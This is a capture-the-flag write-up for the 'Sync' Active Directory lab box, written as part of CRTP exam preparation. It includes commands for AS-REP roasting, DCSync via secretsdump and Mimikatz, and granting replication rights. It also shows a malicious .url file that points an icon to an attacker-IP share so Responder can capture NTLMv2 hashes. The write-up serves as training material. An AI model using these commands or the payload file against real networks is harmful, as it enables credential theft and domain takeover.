2# CRTP Series | CyberSecLabs : Sync Write-up

This is the 2nd blog from the CRTP prep series aimed at the Certified Red Team Professional certification from PentesterAcademy.

If you're new to Active Directory I highly recommend checking out rmusser's extensive guide on AD.

You can access my Gitbook repository here for all the commands.

Without further adu let's get started!

Reconnaissance

First we run an nmap scan to see which ports are open and the services running on them.

• -Pn : Skip host discovery [Don't ping].

• -p- : Scan all 65535 ports.

• -oA : Save output to file.

Let's run an aggressive nmap scan to enumerate the services on all open ports.

• -A : Enable OS detection, version detection, script scanning, and traceroute.

Notes:

• Looking at ports 389(LDAP) and 88(Kerberos), our target is likely a Domain Controller.

• Domain Name : Sync.csl | Hostname: SYNC-DC

• The SMB service seems like an easy target and that's where we'll start enumeration.

Enumeration

We have anonymous read access on 2 shares, but they seem to be empty.

We could enumerate valid users using GetNPNUsers.py from impacket with a username wordlist from Seclists.

Notes:

• We've identified 4 potential usernames.

• It's important to use multiple wordlists to enumerate as many users as you can. I used all the wordlists from Seclists.

• Let's see if any of the users have Kerberos-Pre-authentication disabled. If yes, we could grab the user's crackable AS-REP and brute-force it offline. I go into detail on how this attack works in the Toast Write-up.

• Using GetNPNUsers.py from impacket we were able to identify that user 'manager' has Kerberos Preauth disabled. The AS-REP is stored in a format readable by john.

• Crack the NTLM hash with rockyou.txt as the wordlist.

Great, we've owned user manager!

Notes:

• I wasn't able to get a foothold using Winrm because user 'manager' does not have PSRemoting permissions. Psexec, smbexec and wmiexec didn't work either.

• Taking the hint from the title of the box, we know DCSync is the intended path.

• Let's try using secretsdump.py from impacket to perform this attack remotely.

It works and we have access to all the user hashes! How cool is that?

Let's take a deeper look at what happened.

DCSync Attack simulates the behavior of Domain Controller to retrieve password data via domain replication. This is a feature of Active Directory so that all the DCs remain in sync with each other.

Workflow

1. Discovery of a Domain Controller to request replication.

2. User Replication is requested using the GetNCChanges Function.

3. DC returns replication data to the requestor including password hashes.

• Requires a user with the Replicating Directory Changes All and Replicating Directory Changes privileges.

• Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups have these privileges by default. It is also possible for any user to be granted these specific privileges.

• Once obtained, an adversary uses the Directory Replication Service (DRS) Remote Protocol to replicate data (including credentials) from a Domain Controller.

• Some useful commands:

#Check Rights on Domain Object for current user
#Using Active Directory Module
Get-ACL "AD: \DC=sync,DC=csl"
Get-ACL "AD: \DC=sync,DC=csl" | select-object -ExpandProperty Access

#Using Powerview
Get-ObjectAcl -DistinguishedName "dc=sync,dc=csl" -ResolveGUIDs | ? {($_.IdentityReference -match "manager") -and(($_.ObjectType -match 'replication') -or ($_.ActiveDirectoryRights -match 'GenericAll'))}

#To Add DCSync permissions, run on DC:
Add-ObjectAcl -TargetDistinguishedName "dc=sync,dc=csl" -PrincipalSamAccountName manager -Rights DCSync -Verbose

#Execute attack
#Mimikatz
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

#Remote execution with impacket
sudo python3 secretsdump.py sync.csl/manager:'!!MILKSHAKE!!'@172.31.3.6

This video goes in-depth on how secretsdump.py works. I highly recommend you watch it to understand what happens behind the curtains.

Initial Foothold

Let's grab the Administrator's hash and perform pass-the-hash to get a foothold onto

SYNC-DC. We can use psexec.py for this.

Perfect! On our way to the flags now!

To Summarize:

• Valid usernames were enumerated.

• User manager had Kerberos-Pre-authentication disabled and a weak password configured. This enabled us to grab the AS-REP and crack the hash offline.

• User manager had misconfigured privileges: Replicating Directory Changes All and Replicating Directory Changes.

• This allowed an attacker to use the Directory Replication Service (DRS) Remote Protocol to replicate data from Active Directory[DCSync Attack].

• Hence successfully grabbing the Administrator hash, or even the krbtgt account hash!

Bonus Section : SCF & URL File Attacks [Technique used in Stuxnet Operation]

Enumerating shares with manager's credentials we see something interesting.

Notes:

• We have write-access on the Department share.

• We can use this opportunity to drop an SCF file into the Department share.

• Why you ask? When a user browses the share, the file.scf gets executed. A connection is established automatically from his system to the UNC path that is contained inside the SCF file. Windows will try to authenticate to that share with the user's username and the password. During which, we can use responder to capture the NTLMv2 hash.

• The hash can be cracked offline or relayed to gain an SMB shell/meterpreter reverse shell.

Let's take a small detour to understand how all of this works.

SCF stands for Shell Command File and is a file format that supports a very limited set of Windows Explorer commands, such as opening a Windows Explorer window or showing the Desktop. The "Show Desktop" shortcut we all use on a daily basis is an SCF file.

Just like LNK files (shortcuts), SCF files, when stored on disk, will retrieve an icon file when the user loads the file in a Windows Explorer window.

For many years, LNK files were allowed to store the location of their icon file inside a DLL or at an URL. After the Equation Group used the ability to load malicious code via LNK files in the Stuxnet attacks, Microsoft patched LNK files[Not SCF files] to load their icons only from local resources.

Workflow

• Create an SCF file that loads it's icon image from our SMB server. Windows OS is built to load file icons whenever the user navigates to a folder, no questions asked, no user interaction needed.

• When the user has navigated to a folder containing the malicious SCF file, in milliseconds, the OS will read the SCF file, make a request to our SMB server, and give away the user's credentials in the form of an NTLMv2 password hash.

• This hash is captured through LLMNR Poisoning using a tool such as responder.py.

Now that we've understood what happens behind the scenes, let's get cracking!

1. Drop @file.url inside all the folders within the 'Department' share. Adding the @ symbol in front of the filename will place file.url on top of the share drive.

#Content of @file.url
[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\<Attacker's-IP>\file.icon
IconIndex=1

2. Start listening with Responder:

responder -I tun0 -v

Soon enough we get sysadmin's NTLMv2 hash. Use hashcat to crack it offline with rockyou.txt as the wordlist.

Now that we have the password, let's log on to the target using WinRM.

Upon checking the Powershell history, we see the cronjob that accesses the Department share.

References:

• PayloadAllTheThings

• BleepingComputer